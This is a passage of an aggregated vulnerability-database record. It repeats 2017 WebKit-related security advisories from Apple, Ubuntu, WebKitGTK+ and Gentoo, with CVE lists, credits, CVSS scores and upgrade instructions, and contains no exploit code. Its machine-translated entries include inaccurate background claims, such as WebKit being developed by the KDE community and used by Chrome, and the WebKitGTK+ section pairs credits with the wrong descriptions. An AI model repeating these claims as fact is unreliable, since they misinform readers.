data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0876 | CVE-2017-2362 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS , Safari and tvOS Used in etc. WebKit is prone to multiple security vulnerabilities.
Attackers can exploit these issues to obtain sensitive information or execute arbitrary code and perform unauthorized actions; this may aid in launching further attacks. in the United States. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems; tvOS is a smart TV operating system. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. The following products and versions are affected: Apple iOS prior to 10.2.1; Safari prior to 10.0.3; tvOS prior to 10.1.1.
Safari 10.0.3 may be obtained from the Mac App Store. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0864 | CVE-2017-2350 | plural Apple Used in products WebKit Vulnerabilities that bypass the same origin policy |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site. Apple iOS , Safari and tvOS Used in etc. WebKit is prone to multiple security vulnerabilities.
Attackers can exploit these issues to obtain sensitive information or execute arbitrary code and perform unauthorized actions; this may aid in launching further attacks. in the United States. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems; tvOS is a smart TV operating system. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. The following products and versions are affected: Apple iOS prior to 10.2.1; Safari prior to 10.0.3; tvOS prior to 10.1.1.
Safari 10.0.3 may be obtained from the Mac App Store. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
